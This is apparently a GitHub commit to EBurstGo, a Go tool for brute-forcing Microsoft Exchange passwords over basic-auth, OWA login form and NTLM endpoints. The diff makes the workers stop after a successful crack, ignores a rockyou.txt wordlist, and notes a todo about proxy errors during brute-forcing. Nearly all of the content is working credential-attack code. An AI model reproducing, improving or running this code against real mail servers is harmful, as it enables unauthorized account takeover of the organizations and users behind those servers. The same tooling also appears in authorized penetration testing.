fix: 爆破成功后程序仍在运行的问题

修复爆破某一账户成功后程序仍在运行的问题
X1r0z · Aug 9, 2023 · 86e9975 · 86e9975
1 parent 737e59e
commit 86e9975
Show file tree

Hide file tree

Showing 6 changed files with 70 additions and 26 deletions.
diff --git a/.gitignore b/.gitignore
@@ -3,4 +3,5 @@
 EBurstGo
 user.txt
 pass.txt
+rockyou.txt
 dist/
diff --git a/README.md b/README.md
@@ -81,4 +81,5 @@ $ ./EBurstGo -url https://192.168.30.11 -domain hack-my.com -userf user.txt -pas
 ```
 
 todo
+- 开启代理爆破一段时间会出现 `connection refused`, 待解决
 - `/powershell` 接口 (Kerberos 认证) 待支持
diff --git a/lib/basicbrute.go b/lib/basicbrute.go
@@ -8,14 +8,21 @@ import (
 func BasicBruteWorker(info *TaskInfo) {
 
 	for data := range info.task {
+		if info.done.GetDone() {
+			break
+		}
 		username, password := data[0], data[1]
 		Log.Debug("[*] 尝试: %v:%v", username, password)
 		req, _ := http.NewRequest("OPTIONS", info.u, nil)
 		req.SetBasicAuth(info.domain+"\\"+username, password)
 		req.Header.Add("Connection", "close")
-		res, _ := Client.Do(req)
+		res, err := Client.Do(req)
+		if err != nil {
+			panic(err)
+		}
 		if res.StatusCode != 401 && res.StatusCode != 408 && res.StatusCode != 504 {
 			Log.Success("[+] 成功: %v", username+":"+password)
+			info.done.SetDone()
 		} else {
 			Log.Failed("[-] 失败: %v", username+":"+password)
 		}

diff --git a/lib/httpbrute.go b/lib/httpbrute.go
@@ -18,6 +18,9 @@ func HttpBruteWorker(info *TaskInfo) {
 	referer, _ := url.JoinPath(info.targetUrl, "/owa/auth/logon.aspx?replaceCurrent=1&url="+refUrl)
 
 	for data := range info.task {
+		if info.done.GetDone() {
+			break
+		}
 		username, password := data[0], data[1]
 		Log.Debug("[*] 尝试: %v:%v", username, password)
 		form := url.Values{
@@ -36,13 +39,17 @@ func HttpBruteWorker(info *TaskInfo) {
 		req.Header.Set("Cookie", "PrivateComputer=true; PBack=0")
 		req.Header.Set("Connection", "close")
 
-		res, _ := Client.Do(req)
+		res, err := Client.Do(req)
+		if err != nil {
+			panic(err)
+		}
 		location := res.Header.Get("Location")
 
 		if location == "" {
 			Log.Failed("[-] 失败: %v", username+":"+password)
 		} else if !strings.Contains(location, "reason") {
 			Log.Success("[+] 成功: %v", username+":"+password)
+			info.done.SetDone()
 		} else {
 			Log.Failed("[-] 失败: %v", username+":"+password)
 		}

diff --git a/lib/ntlmbrute.go b/lib/ntlmbrute.go
@@ -10,6 +10,9 @@ import (
 func NtlmBruteWorker(info *TaskInfo) {
 
 	for data := range info.task {
+		if info.done.GetDone() {
+			break
+		}
 		username, password := data[0], data[1]
 		Log.Debug("[*] 尝试: %v:%v", username, password)
 
@@ -28,10 +31,13 @@ func NtlmBruteWorker(info *TaskInfo) {
 		}
 		req, _ := http.NewRequest("GET", info.u, nil)
 		req.SetBasicAuth(info.domain+"\\"+username, password)
-		res, _ := client.Do(req)
-
+		res, err := client.Do(req)
+		if err != nil {
+			panic(err)
+		}
 		if res.StatusCode != 401 && res.StatusCode != 408 && res.StatusCode != 504 {
 			Log.Success("[+] 成功: %v", username+":"+password)
+			info.done.SetDone()
 		} else {
 			Log.Failed("[-] 失败: %v", username+":"+password)
 		}

diff --git a/lib/run.go b/lib/run.go
@@ -12,9 +12,27 @@ type TaskInfo struct {
 	u         string
 	domain    string
 	task      chan []string
+	done      *DoneFlag
 	delay     int
 }
 
+type DoneFlag struct {
+	mu   sync.RWMutex
+	done bool
+}
+
+func (c *DoneFlag) GetDone() bool {
+	c.mu.RLock()
+	defer c.mu.RUnlock()
+	return c.done
+}
+
+func (c *DoneFlag) SetDone() {
+	c.mu.Lock()
+	defer c.mu.Unlock()
+	c.done = true
+}
+
 type BruteWorker func(info *TaskInfo)
 
 func BruteRunner(targetUrl string, mode string, domain string, userDict []string, passDict []string, n int, delay int, worker BruteWorker) {
@@ -24,38 +42,42 @@ func BruteRunner(targetUrl string, mode string, domain string, userDict []string
 	Log.Info("[*] 使用 %v 接口爆破: %v", mode, targetUrl)
 	Log.Info("[*] 用户名:%v 密码:%v 共计:%v", len(userDict), len(passDict), len(userDict)*len(passDict))
 
-	task := make(chan []string, len(userDict)*len(passDict))
-
-	info := &TaskInfo{
-		targetUrl: targetUrl,
-		mode:      mode,
-		u:         u,
-		domain:    domain,
-		task:      task,
-		delay:     delay,
-	}
-
 	t1 := time.Now()
 
 	for _, username := range userDict {
+
+		task := make(chan []string, len(passDict))
+		done := &DoneFlag{done: false}
+
+		info := &TaskInfo{
+			targetUrl: targetUrl,
+			mode:      mode,
+			u:         u,
+			domain:    domain,
+			task:      task,
+			done:      done,
+			delay:     delay,
+		}
+
 		for _, password := range passDict {
 			data := []string{username, password}
 			task <- data
 		}
-	}
-	close(task)
 
-	var wg sync.WaitGroup
+		close(task)
 
-	for i := 0; i < n; i++ {
-		wg.Add(1)
-		go func() {
-			defer wg.Done()
-			worker(info)
-		}()
-	}
+		var wg sync.WaitGroup
+
+		for i := 0; i < n; i++ {
+			wg.Add(1)
+			go func() {
+				defer wg.Done()
+				worker(info)
+			}()
+		}
 
-	wg.Wait()
+		wg.Wait()
+	}
 
 	t2 := time.Now()
 	Log.Info("[*] 耗时: %v", t2.Sub(t1))